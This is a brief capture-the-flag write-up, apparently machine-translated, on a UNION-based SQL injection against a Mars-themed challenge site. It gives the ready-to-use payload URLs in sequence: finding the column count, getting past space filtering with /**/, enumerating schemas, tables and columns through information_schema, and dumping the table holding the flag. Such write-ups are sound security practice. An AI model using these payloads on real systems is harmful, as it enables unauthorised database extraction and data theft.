Click on the left side of the webpage, bp captures packets, and you can see the query statement. /query?search=arabia_terra/**/ORDER/**/BY/**/2The initial judgment column number is 2. If you modify the URL in bp, it is best to encode the space %20, or replace it with /**/ and then
use the statement to find out that the database is aliens
/query?search=arabia_terra%20union%20select%201,database()
/query?search=arabia_terra%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()
Explode the tables of this database: amazonis_planitia, arabia_terra, chryse_planitia, hellas_basin, hesperia_planum, noachis_terra, olympus_mons, tharsis_rise, utopia_basin
are those on the directory, it seems useless
/query?search=arabia_terra%20union%20select%201,group_concat(schema_name)%20from%20information_schema.schemata
Three databases burst out: information_schema, alien_code, aliens, and the most likely one is alien_code
/query?search=arabia_terra%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema="alien_code"
There is only one table: code
/query?search=arabia_terra%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name="code"
Two fields: id, code
/query?search=arabia_terra%20union%20select%201,group_concat(id,code)%20from%20alien_code.code
get the flag